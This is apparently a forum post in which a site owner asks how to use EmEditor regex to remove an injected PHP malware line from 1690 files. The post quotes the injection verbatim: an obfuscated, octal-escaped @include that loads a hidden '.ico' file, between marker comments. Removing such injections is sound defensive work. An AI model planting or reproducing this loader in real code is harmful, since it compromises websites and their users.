I try to find a way to find and replace using EMEditor and a Regular Expression. I try to applu this for the item below:
<?php
/*f04b8*/
@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";
/*f04b8*/ // ini_set(?display_errors?, 1);
I try to replace / erase the code between
<?php
and
// ini_set(?display_errors?, 1);
everything in between is this maleware scipt that I try to get out from many files.
I look for a easy way to delete this in 1690 files. Any idea would be very helpfull.
Best wishes, Thomas